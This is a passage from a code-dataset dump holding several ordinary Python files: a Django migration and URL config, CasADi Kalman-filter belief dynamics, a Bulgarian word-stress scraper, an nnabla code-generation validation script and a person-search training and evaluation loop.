"usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 108, "usage_type": "name"}, {"api_name": "lwclr.models.LitEvaluator", "line_number": 110, "usage_type": "call"}, {"api_name": "lwclr.models", "line_number": 110, "usage_type": "name"}, {"api_name": "datamodules.CIFAR10DM", "line_number": 118, "usage_type": "call"}, {"api_name": "datamodules.CIFAR100DM", "line_number": 120, "usage_type": "call"}, {"api_name": "datamodules.ImageNetDM", "line_number": 123, "usage_type": "call"}, {"api_name": "datamodules.DanbooruFacesFullDM", "line_number": 126, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 148, "usage_type": 
"call"}, {"api_name": "wandb.init", "line_number": 149, "usage_type": "call"}, {"api_name": "wandb.run", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.loggers.WandbLogger", "line_number": 151, "usage_type": "call"}, {"api_name": "pytorch_lightning.seed_everything", "line_number": 154, "usage_type": "call"}]} +{"seq_id": "560999577", "text": "# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n\n # Changing field 'Post.image'\n db.alter_column(u'app_post', 'image', self.gf('pyuploadcare.dj.models.ImageField')())\n\n def backwards(self, orm):\n\n # Changing field 'Post.image'\n db.alter_column(u'app_post', 'image', self.gf('pyuploadcare.dj.models.FileField')())\n\n models = {\n u'app.post': {\n 'Meta': {'object_name': 'Post'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'image': ('pyuploadcare.dj.models.ImageField', [], {}),\n 'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '142', 'blank': 'True'}),\n 'text': ('django.db.models.fields.TextField', [], {}),\n 'title': ('django.db.models.fields.CharField', [], {'max_length': '142'})\n }\n }\n\n complete_apps = ['app']", "sub_path": "app/migrations/0003_auto__chg_field_post_image.py", "file_name": "0003_auto__chg_field_post_image.py", "file_ext": "py", "file_size_in_byte": 1070, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "south.v2.SchemaMigration", "line_number": 8, "usage_type": "name"}, {"api_name": "south.db.db.alter_column", "line_number": 13, "usage_type": "call"}, {"api_name": "south.db.db", "line_number": 13, "usage_type": "name"}, {"api_name": "south.db.db.alter_column", "line_number": 18, "usage_type": "call"}, {"api_name": "south.db.db", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "119372435", "text": "# coding: utf8\nfrom django.urls import path\nfrom .views import LocationListView, LocationCreateView, LocationUpdateView, LocationDeleteView\n\nurlpatterns_v1_locations = ([\n\n path('', LocationListView.as_view(), name='list'),\n path('create', LocationCreateView.as_view(), name='create'),\n path('update//', LocationUpdateView.as_view(), name='update'),\n path('delete//', LocationDeleteView.as_view(), name='delete'),\n\n], 'locations')\n", "sub_path": "apps/stations/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 459, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.LocationListView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.LocationListView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "views.LocationCreateView.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "views.LocationCreateView", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.LocationUpdateView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "views.LocationUpdateView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", 
"line_number": 10, "usage_type": "call"}, {"api_name": "views.LocationDeleteView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "views.LocationDeleteView", "line_number": 10, "usage_type": "name"}]} +{"seq_id": "359328834", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 26 16:39:10 2015\n\nDynamics specifications\n\n@author: plim\n\"\"\"\n\nimport casadi as ca\nimport casadi.tools as cat\nfrom model import *\n\n# %% =========================================================================\n# Extended Kalman filter\n# ============================================================================\n\ndef ext_kalman_filter(belief, control, observation, # current (b, u, z)\n F, dt, A_fcn, h, C_fcn, # dynamics\n Q, obs_cov_fcn): # covariances Q and R(x)\n belief_next = cat.struct_SX(belief)\n \n # Predict the mean\n [mu_bar] = F([ belief['m'], control, dt ])\n \n # Compute linearization\n [A,_] = A_fcn([ belief['m'], control, dt ])\n [C,_] = C_fcn([ mu_bar ])\n \n # Predict the covariance\n S_bar = ca.mul([ A, belief['S'], A.T ]) + Q\n \n # Get the observations noise covariance\n [R] = obs_cov_fcn([ mu_bar ])\n \n # Compute the inverse\n P = ca.mul([ C, S_bar, C.T ]) + R\n P_inv = ca.inv(P)\n \n # Kalman gain\n K = ca.mul([ S_bar, C.T, P_inv ])\n \n # Update equations\n nx = belief['m'].size()\n [z_bar] = h([ mu_bar ])\n belief_next['m'] = mu_bar + ca.mul(K, observation - z_bar)\n belief_next['S'] = ca.mul(ca.DMatrix.eye(nx) - ca.mul(K,C), S_bar)\n \n # (belief, control, observation) -> next_belief\n return ca.SXFunction('Extended Kalman filter',\n [belief,control,observation], [belief_next])\n\n\n# %% =========================================================================\n# Belief dynamics\n# ============================================================================\n\ndef belief_dynamics(belief, control, # current (b, u)\n F, dt, A_fcn, C_fcn, # dynamics\n Q, obs_cov_fcn): # covariances Q and R(x)\n belief_next = cat.struct_SX(belief)\n \n # Predict the mean\n [mu_bar] = F([ belief['m'], control, dt ])\n \n # Compute linearization\n [A,_] = A_fcn([ belief['m'], control, dt ])\n [C,_] = C_fcn([ mu_bar ])\n \n # Predict the covariance\n S_bar = ca.mul([ A, belief['S'], A.T ]) + Q\n \n # Get the observations noise covariance\n [R] = obs_cov_fcn([ mu_bar ])\n \n # Compute the inverse\n P = ca.mul([ C, S_bar, C.T ]) + R\n P_inv = ca.inv(P)\n \n # Kalman gain\n K = ca.mul([ S_bar, C.T, P_inv ])\n \n # Update equations\n nx = belief['m'].size()\n belief_next['m'] = mu_bar\n belief_next['S'] = ca.mul(ca.DMatrix.eye(nx) - ca.mul(K,C), S_bar)\n \n # (belief, control) -> next_belief\n return ca.SXFunction('Belief dynamics',[belief,control],[belief_next])\n\n\n# %% =========================================================================\n# Extended-belief dynamics\n# ============================================================================\ndef ext_belief_dynamics(ext_belief, control,\n F, dt, A_fcn, C_fcn,\n Q, obs_cov_fcn):\n ext_belief_next = cat.struct_SX(ext_belief)\n \n # Predict the mean\n [mu_bar] = F([ ext_belief['m'], control, dt ])\n \n # Compute linearization\n [A,_] = A_fcn([ ext_belief['m'], control, dt ])\n [C,_] = C_fcn([ mu_bar ])\n \n # Predict the covariance\n S_bar = ca.mul([ A, ext_belief['S'], A.T ]) + Q\n \n # Get the observations noise covariance\n [R] = obs_cov_fcn([ mu_bar ])\n \n # Compute the inverse\n P = ca.mul([ C, S_bar, C.T ]) + R\n P_inv = ca.inv(P)\n \n # Kalman gain\n K = ca.mul([ S_bar, C.T, P_inv ])\n \n # Update equations\n nx = 
ext_belief['m'].size()\n ext_belief_next['m'] = mu_bar\n ext_belief_next['S'] = ca.mul(ca.DMatrix.eye(nx) - ca.mul(K,C), S_bar)\n ext_belief_next['L'] = ca.mul([ A, ext_belief['L'], A.T ]) + \\\n ca.mul([ K, C, S_bar ])\n \n # (ext_belief, control) -> next_ext_belief\n return ca.SXFunction('Extended-belief dynamics',\n [ext_belief,control],[ext_belief_next])\n\n\n# %% =========================================================================\n# Functions\n# ============================================================================\n\n# Countinuous dynamics x_dot = f(x, u)\nf = continuous_dynamics(state, control)\n\n# Discrete dynamics x_next = F(x, u, dt)\n#F = ca.simpleRK(f, N_rk)\ndt_sym = ca.SX.sym('dt')\nF = ca.SXFunction('Discrete dynamics',\n [state, control, dt_sym],\n [state + dt_sym * f([state, control])[0]])\n\n# Jacobian dx_next/dx\nA_fcn = F.jacobian(0,0)\n\n# Observation function z = h(x)\nh = ca.SXFunction('Observation function',[state],[observation])\n\n# Jacobian dz/dx\nC_fcn = h.jacobian(0,0) \n\n# State-dependent covariance R = R(x)\nobs_cov_fcn = observation_covariance(state, observation)\n\n# Extended Kalman filter b_next = EKF(b, u, z)\nEKF = ext_kalman_filter(belief, control, observation,\n F, dt, A_fcn, h, C_fcn,\n Q, obs_cov_fcn)\n\n# Belief dynamics b_next = BF(b, u)\nBF = belief_dynamics(belief, control,\n F, dt, A_fcn, C_fcn,\n Q, obs_cov_fcn)\n\n# Extended-belief dynamics (includes L, for plotting purposes)\nEBF = ext_belief_dynamics(ext_belief, control,\n F, dt, A_fcn, C_fcn,\n Q, obs_cov_fcn)\n\n\n\n\n\n", "sub_path": "src/dynamics.py", "file_name": "dynamics.py", "file_ext": "py", "file_size_in_byte": 5646, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "casadi.tools.struct_SX", "line_number": 21, "usage_type": "call"}, {"api_name": "casadi.tools", "line_number": 21, "usage_type": "name"}, {"api_name": "casadi.mul", "line_number": 31, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 37, "usage_type": "call"}, {"api_name": "casadi.inv", "line_number": 38, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 41, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 46, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 47, "usage_type": "call"}, {"api_name": "casadi.DMatrix.eye", "line_number": 47, "usage_type": "call"}, {"api_name": "casadi.DMatrix", "line_number": 47, "usage_type": "attribute"}, {"api_name": "casadi.SXFunction", "line_number": 50, "usage_type": "call"}, {"api_name": "casadi.tools.struct_SX", "line_number": 61, "usage_type": "call"}, {"api_name": "casadi.tools", "line_number": 61, "usage_type": "name"}, {"api_name": "casadi.mul", "line_number": 71, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 77, "usage_type": "call"}, {"api_name": "casadi.inv", "line_number": 78, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 81, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 86, "usage_type": "call"}, {"api_name": "casadi.DMatrix.eye", "line_number": 86, "usage_type": "call"}, {"api_name": "casadi.DMatrix", "line_number": 86, "usage_type": "attribute"}, {"api_name": "casadi.SXFunction", "line_number": 89, "usage_type": "call"}, {"api_name": "casadi.tools.struct_SX", "line_number": 98, "usage_type": "call"}, {"api_name": "casadi.tools", "line_number": 98, "usage_type": "name"}, {"api_name": "casadi.mul", "line_number": 108, "usage_type": "call"}, {"api_name": "casadi.mul", 
"line_number": 114, "usage_type": "call"}, {"api_name": "casadi.inv", "line_number": 115, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 118, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 123, "usage_type": "call"}, {"api_name": "casadi.DMatrix.eye", "line_number": 123, "usage_type": "call"}, {"api_name": "casadi.DMatrix", "line_number": 123, "usage_type": "attribute"}, {"api_name": "casadi.mul", "line_number": 124, "usage_type": "call"}, {"api_name": "casadi.mul", "line_number": 125, "usage_type": "call"}, {"api_name": "casadi.SXFunction", "line_number": 128, "usage_type": "call"}, {"api_name": "casadi.SX.sym", "line_number": 141, "usage_type": "call"}, {"api_name": "casadi.SX", "line_number": 141, "usage_type": "attribute"}, {"api_name": "casadi.SXFunction", "line_number": 142, "usage_type": "call"}, {"api_name": "casadi.SXFunction", "line_number": 150, "usage_type": "call"}]} +{"seq_id": "76685423", "text": "import requests\nimport re\nimport csv\nimport time\nfrom bs4 import BeautifulSoup\n\n\ndef get_html(word):\n url = \"http://ibl.bas.bg/dictionary_portal/lang/bg/all/{}\".format(word)\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'lxml')\n return soup.find_all('blockquote')[0]\n\ndef search_word(word, quote):\n if quote == None:\n return None\n all_possible = permute_accent(word)\n for poss in all_possible:\n reg = re.compile(poss)\n m = reg.search(quote.text)\n if m is not None:\n return m.group(0)\n\n\ndef permute_accent(word):\n vowels = ['и', 'е', 'у', 'о', 'ъ', 'а']\n all_perms= []\n vowel_regex = re.compile(\"[\"+\"\".join(vowels) + \"]\")\n all_vowels = vowel_regex.finditer(word)\n for match in all_vowels:\n\n current_word = word[0:match.start()] +word[match.start()] + u\"\\u0300\" + word[match.end():]\n all_perms.append(current_word)\n\n return all_perms\n\n\ndef get_stress_pattern(word):\n vowels = ['и', 'е', 'у', 'о', 'ъ', 'а']\n pat = \"\"\n if word is None:\n return\n for i,c in enumerate(list(word)):\n try:\n if c in vowels and word[i+1] != u\"\\u0300\":\n pat +='0'\n if c in vowels and word[i+1] == u\"\\u0300\":\n pat += '1'\n continue\n except IndexError:\n if c in vowels:\n pat += '0'\n else:\n continue\n return pat\n\n\ndef get_all():\n all_stress = {}\n with open(\"bg_full.txt\") as f1:\n lines = f1.readlines()\n for line in lines:\n word = re.split(\"\\s\", line)[0]\n stressed_word = search_word(word, get_html(word))\n stress_pattern = get_stress_pattern(stressed_word)\n if stress_pattern is not None:\n all_stress.update({word: stress_pattern})\n time.sleep(0.01)\n return all_stress\n\nall_dict = get_all()\nprint(len(all_dict))\nwith open(\"stresses.txt\", \"w\") as f2:\n for k,v in all_dict.items():\n f2.write(k.strip() + \"\\t\" + v.strip() + \"\\n\")\n\n\n# html = get_html(\"имаме\")\n# print(search_word(\"имаме\", html), \" found\")\n# print(get_stress_pattern(search_word(\"имаме\", html)))", "sub_path": "Bulgarian/Bulgarian_Scraper.py", "file_name": "Bulgarian_Scraper.py", "file_ext": "py", "file_size_in_byte": 2187, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 11, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 19, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "re.split", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 
68, "usage_type": "call"}]} +{"seq_id": "247656790", "text": "import os\nimport json\nimport argparse\nimport numpy as np\nimport nnabla as nn\nimport nnabla.solvers as S\nimport nnabla.functions as F\nimport nnabla.logger as logger\nfrom nnabla.ext_utils import get_extension_context\n\nimport src.model as model\nfrom .dataset import Dataset\nfrom .grammar import NodeType, Rule, Grammar\nfrom .python.grammar import *\nfrom .decoder import Decoder\nfrom .utils import bleu4\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--context', \"-c\", type=str, default=\"cpu\")\nparser.add_argument(\n '--valid', type=str, default=os.path.join(\"dataset\", \"django\", \"valid\"))\nparser.add_argument('--max-query-length', type=int, default=70)\nparser.add_argument('--max-action-length', type=int, default=100)\nparser.add_argument('--embedding-size', type=int, default=128)\nparser.add_argument('--node-type-embedding-size', type=int, default=64)\nparser.add_argument('--lstm-state-size', type=int, default=256)\nparser.add_argument('--hidden-state-size', type=int, default=50)\nparser.add_argument(\n '--result', type=str, default=os.path.join(\"result\", \"django\"))\nparser.add_argument(\n '--output', type=str, default=os.path.join(\"result\", \"django\", \"valid\"))\nparser.add_argument('--dropout', type=float, default=0.2)\nparser.add_argument('--beam-size', type=int, default=15)\nargs = parser.parse_args()\n\n# Context\nextension_module = args.context\nif args.context is None:\n extension_module = 'cpu'\nlogger.info(\"Running in %s\" % extension_module)\nctx = get_extension_context(extension_module, device_id=0)\nnn.set_default_context(ctx)\n\n# Create directory for output\nif not os.path.exists(args.output):\n os.makedirs(args.output)\n\n# Load grammar info\nlogger.info(\"Load grammar/words info\")\nwith open(os.path.join(args.result, \"words.json\")) as f:\n word_to_id = json.load(f)\nwith open(os.path.join(args.result, \"tokens.json\")) as f:\n tokens = json.load(f)\nwith open(os.path.join(args.result, \"rules.json\")) as f:\n rules = json.load(f)\n rules = list(map(Rule.from_json, rules))\nwith open(os.path.join(args.result, \"node_types.json\")) as f:\n node_types = json.load(f)\n node_types = list(map(NodeType.from_json, node_types))\ngrammar = Grammar(node_types, rules, tokens)\n\n# Load dataset\nlogger.info(\"Load dataset\")\ndata = Dataset(args.valid, shuffle=False)\ndata.prepare(word_to_id, grammar)\n\nlogger.info(\"Create monitors\")\nimport nnabla.monitor as M\nmonitor = M.Monitor(args.output)\nmonitor_vacc = M.MonitorSeries(\"validation-accuracy\", monitor, interval=1)\nmonitor_vbleu4 = M.MonitorSeries(\"validation-bleu4\", monitor, interval=1)\n\nlogger.info(\"Load parameter\")\nnn.load_parameters(os.path.join(args.result, \"model.h5\"))\n\nlogger.info(\"Prepare decoder\")\ndecoder = Decoder(args.beam_size, args.max_query_length,\n args.max_action_length, word_to_id, grammar,\n args.embedding_size, args.node_type_embedding_size,\n args.lstm_state_size, args.hidden_state_size, args.dropout)\n\nimport transpyle\nunparser = transpyle.python.unparser.NativePythonUnparser()\n# validation\nsum_bleu4 = 0.0\nacc = 0.0\nN = 0\nfor i in range(data.size):\n if i % 10 == 0:\n logger.info(\"valid : {} / {} samples\".format(i, data.size))\n sample = data.next()\n\n length = min(args.max_query_length, len(sample.encoder_input.query))\n if len(sample.sequence) > args.max_action_length:\n continue\n\n valid = False\n try:\n reference = unparser.unparse(to_ast(sample.sequence))\n valid = True\n N 
+= 1\n except RuntimeError as e:\n pass\n\n if valid:\n h = decoder.decode(sample.annotation, sample.encoder_input)\n try:\n if not (h is None):\n result = unparser.unparse(to_ast(h.sequence))\n if result == reference:\n acc += 1.0\n sum_bleu4 += bleu4(reference, result)\n except:\n pass\nacc /= N\nsum_bleu4 /= N\nmonitor_vacc.add(1, acc)\nmonitor_vbleu4.add(1, sum_bleu4)\n", "sub_path": "src/valid.py", "file_name": "valid.py", "file_ext": "py", "file_size_in_byte": 3960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "nnabla.logger.info", "line_number": 40, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 40, "usage_type": "name"}, {"api_name": "nnabla.ext_utils.get_extension_context", "line_number": 41, "usage_type": "call"}, {"api_name": "nnabla.set_default_context", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "nnabla.logger.info", "line_number": 49, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "grammar.Rule.from_json", "line_number": 56, "usage_type": "attribute"}, {"api_name": "grammar.Rule", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 58, "usage_type": "call"}, {"api_name": "grammar.NodeType.from_json", "line_number": 59, "usage_type": "attribute"}, {"api_name": "grammar.NodeType", "line_number": 59, "usage_type": "name"}, {"api_name": "grammar.Grammar", "line_number": 60, "usage_type": "call"}, {"api_name": "nnabla.logger.info", "line_number": 63, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 63, "usage_type": "name"}, {"api_name": "dataset.Dataset", "line_number": 64, "usage_type": "call"}, {"api_name": "nnabla.logger.info", "line_number": 67, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 67, "usage_type": "name"}, {"api_name": "nnabla.monitor.Monitor", "line_number": 69, "usage_type": "call"}, {"api_name": "nnabla.monitor", "line_number": 69, "usage_type": "name"}, 
{"api_name": "nnabla.monitor.MonitorSeries", "line_number": 70, "usage_type": "call"}, {"api_name": "nnabla.monitor", "line_number": 70, "usage_type": "name"}, {"api_name": "nnabla.monitor.MonitorSeries", "line_number": 71, "usage_type": "call"}, {"api_name": "nnabla.monitor", "line_number": 71, "usage_type": "name"}, {"api_name": "nnabla.logger.info", "line_number": 73, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 73, "usage_type": "name"}, {"api_name": "nnabla.load_parameters", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "nnabla.logger.info", "line_number": 76, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 76, "usage_type": "name"}, {"api_name": "decoder.Decoder", "line_number": 77, "usage_type": "call"}, {"api_name": "transpyle.python.unparser.NativePythonUnparser", "line_number": 83, "usage_type": "call"}, {"api_name": "transpyle.python", "line_number": 83, "usage_type": "attribute"}, {"api_name": "nnabla.logger.info", "line_number": 90, "usage_type": "call"}, {"api_name": "nnabla.logger", "line_number": 90, "usage_type": "name"}, {"api_name": "decoder.decode", "line_number": 106, "usage_type": "call"}, {"api_name": "utils.bleu4", "line_number": 112, "usage_type": "call"}]} +{"seq_id": "148952638", "text": "import math\r\nimport sys\r\nfrom copy import deepcopy\r\n\r\nimport torch\r\nfrom torch.nn.utils import clip_grad_norm_\r\nfrom tqdm import tqdm\r\n\r\nfrom eval_func import eval_detection, eval_search_cuhk, eval_search_prw, eval_search_mvn\r\nfrom utils.utils import (\r\n MetricLogger,\r\n SmoothedValue,\r\n is_main_process,\r\n mkdir,\r\n reduce_dict,\r\n warmup_lr_scheduler,\r\n)\r\nfrom config import ConfigMVN\r\n\r\ndef to_device(images, targets, device):\r\n images = [image.to(device) for image in images]\r\n for t in targets:\r\n t[\"boxes\"] = t[\"boxes\"].to(device)\r\n t[\"labels\"] = t[\"labels\"].to(device)\r\n return images, targets\r\n\r\n\r\ndef train_one_epoch(cfg, model, optimizer, data_loader, device, epoch, tfboard=None):\r\n model.train()\r\n metric_logger = MetricLogger(delimiter=\" \")\r\n metric_logger.add_meter(\"lr\", SmoothedValue(window_size=1, fmt=\"{value:.6f}\"))\r\n header = \"Epoch: [{}]\".format(epoch)\r\n\r\n # warmup learning rate in the first epoch\r\n if epoch == 0 and True:\r\n warmup_factor = 1.0 / 1000\r\n # FIXME: min(1000, len(data_loader) - 1)\r\n warmup_iters = len(data_loader) - 1\r\n warmup_scheduler = warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor)\r\n\r\n for i, (images, targets) in enumerate(\r\n metric_logger.log_every(data_loader, cfg.DISP_PERIOD, header)\r\n ):\r\n\r\n if False:\r\n # show the image with annotations to check\r\n import matplotlib.pyplot as plt\r\n from PIL import Image\r\n import os\r\n import cv2\r\n import numpy as np\r\n for im, tgt in zip(images, targets):\r\n print(\"images:\", type(im), im.shape, im)\r\n print(\"targets:\", type(tgt), tgt)\r\n image = (np.array(im.cpu().numpy().transpose(1, 2, 0)) * 255).astype(np.uint8)\r\n image_tgt = (np.array(Image.open(os.path.join('/home/pengzheng/datasets/ps/mvn/frames', tgt['img_name'])).convert('RGB')) * 1).astype(np.uint8)\r\n boxes = tgt['boxes']\r\n labels = tgt['labels']\r\n for box, lbl in zip(boxes, labels):\r\n x1, y1, x2, y2 = box\r\n cv2.rectangle(image_tgt, (x1, y1), (x2, y2), (0, 0, 255), 2)\r\n cv2.putText(image_tgt, str(lbl), (x1, y1+50), 
cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 0, 0), 1, cv2.LINE_AA)\r\n plt.imshow(image)\r\n plt.figure()\r\n plt.imshow(image_tgt)\r\n plt.show()\r\n # break\r\n images, targets = to_device(images, targets, device)\r\n\r\n loss_dict = model(images, targets)\r\n losses = sum(loss for loss in loss_dict.values())\r\n\r\n # reduce losses over all GPUs for logging purposes\r\n loss_dict_reduced = reduce_dict(loss_dict)\r\n losses_reduced = sum(loss for loss in loss_dict_reduced.values())\r\n loss_value = losses_reduced.item()\r\n\r\n if not math.isfinite(loss_value):\r\n print(f\"Loss is {loss_value}, stopping training\")\r\n print(loss_dict_reduced)\r\n sys.exit(1)\r\n\r\n optimizer.zero_grad()\r\n losses.backward()\r\n if cfg.SOLVER.CLIP_GRADIENTS > 0:\r\n clip_grad_norm_(model.parameters(), cfg.SOLVER.CLIP_GRADIENTS)\r\n optimizer.step()\r\n\r\n if epoch == 0 and True:\r\n warmup_scheduler.step()\r\n\r\n metric_logger.update(loss=loss_value, **loss_dict_reduced)\r\n metric_logger.update(lr=optimizer.param_groups[0][\"lr\"])\r\n if tfboard and is_main_process():\r\n iter = epoch * len(data_loader) + i\r\n for k, v in loss_dict_reduced.items():\r\n tfboard.add_scalars(\"train\", {k: v}, iter)\r\n\r\n\r\n@torch.no_grad()\r\ndef evaluate_performance(\r\n model, gallery_loader, query_loader, device, use_gt=False, use_cache=False, use_cbgm=False\r\n):\r\n \"\"\"\r\n Args:\r\n use_gt (bool, optional): Whether to use GT as detection results to verify the upper\r\n bound of person search performance. Defaults to False.\r\n use_cache (bool, optional): Whether to use the cached features. Defaults to False.\r\n use_cbgm (bool, optional): Whether to use Context Bipartite Graph Matching algorithm.\r\n Defaults to False.\r\n \"\"\"\r\n model.eval()\r\n if use_cache:\r\n eval_cache = torch.load(\"data/eval_cache/eval_cache.pth\")\r\n gallery_dets = eval_cache[\"gallery_dets\"]\r\n gallery_feats = eval_cache[\"gallery_feats\"]\r\n query_dets = eval_cache[\"query_dets\"]\r\n query_feats = eval_cache[\"query_feats\"]\r\n query_box_feats = eval_cache[\"query_box_feats\"]\r\n else:\r\n gallery_dets, gallery_feats = [], []\r\n for images, targets in tqdm(gallery_loader, ncols=0):\r\n images, targets = to_device(images, targets, device)\r\n if not use_gt:\r\n outputs = model(images)\r\n else:\r\n boxes = targets[0][\"boxes\"]\r\n n_boxes = boxes.size(0)\r\n embeddings = model(images, targets)\r\n outputs = [\r\n {\r\n \"boxes\": boxes,\r\n \"embeddings\": torch.cat(embeddings),\r\n \"labels\": torch.ones(n_boxes).to(device),\r\n \"scores\": torch.ones(n_boxes).to(device),\r\n }\r\n ]\r\n\r\n for output in outputs:\r\n box_w_scores = torch.cat([output[\"boxes\"], output[\"scores\"].unsqueeze(1)], dim=1)\r\n gallery_dets.append(box_w_scores.cpu().numpy())\r\n gallery_feats.append(output[\"embeddings\"].cpu().numpy())\r\n\r\n # regarding query image as gallery to detect all people\r\n # i.e. 
query person + surrounding people (context information)\r\n query_dets, query_feats = [], []\r\n for images, targets in tqdm(query_loader, ncols=0):\r\n images, targets = to_device(images, targets, device)\r\n # targets will be modified in the model, so deepcopy it\r\n outputs = model(images, deepcopy(targets), query_img_as_gallery=True)\r\n\r\n # consistency check\r\n gt_box = targets[0][\"boxes\"].squeeze()\r\n assert (\r\n gt_box - outputs[0][\"boxes\"][0]\r\n ).sum() <= 0.001, \"GT box must be the first one in the detected boxes of query image\"\r\n\r\n for output in outputs:\r\n box_w_scores = torch.cat([output[\"boxes\"], output[\"scores\"].unsqueeze(1)], dim=1)\r\n query_dets.append(box_w_scores.cpu().numpy())\r\n query_feats.append(output[\"embeddings\"].cpu().numpy())\r\n\r\n # extract the features of query boxes\r\n query_box_feats = []\r\n for images, targets in tqdm(query_loader, ncols=0):\r\n images, targets = to_device(images, targets, device)\r\n embeddings = model(images, targets)\r\n assert len(embeddings) == 1, \"batch size in test phase should be 1\"\r\n query_box_feats.append(embeddings[0].cpu().numpy())\r\n\r\n mkdir(\"data/eval_cache\")\r\n save_dict = {\r\n \"gallery_dets\": gallery_dets,\r\n \"gallery_feats\": gallery_feats,\r\n \"query_dets\": query_dets,\r\n \"query_feats\": query_feats,\r\n \"query_box_feats\": query_box_feats,\r\n }\r\n torch.save(save_dict, \"data/eval_cache/eval_cache.pth\")\r\n\r\n eval_detection(gallery_loader.dataset, gallery_dets, det_thresh=0.01)\r\n if gallery_loader.dataset.name == \"CUHK-SYSU\":\r\n eval_search_cuhk(\r\n gallery_loader.dataset,\r\n query_loader.dataset,\r\n gallery_dets,\r\n gallery_feats,\r\n query_box_feats,\r\n query_dets,\r\n query_feats,\r\n cbgm=use_cbgm,\r\n gallery_size=100,\r\n )\r\n elif gallery_loader.dataset.name == \"PRW\":\r\n eval_search_prw(\r\n gallery_loader.dataset,\r\n query_loader.dataset,\r\n gallery_dets,\r\n gallery_feats,\r\n query_box_feats,\r\n query_dets,\r\n query_feats,\r\n cbgm=use_cbgm,\r\n )\r\n elif gallery_loader.dataset.name == \"MVN\":\r\n eval_search_mvn(\r\n gallery_loader.dataset,\r\n query_loader.dataset,\r\n gallery_dets,\r\n gallery_feats,\r\n query_box_feats,\r\n query_dets,\r\n query_feats,\r\n cbgm=use_cbgm,\r\n gallery_size=ConfigMVN().gallery_size,\r\n 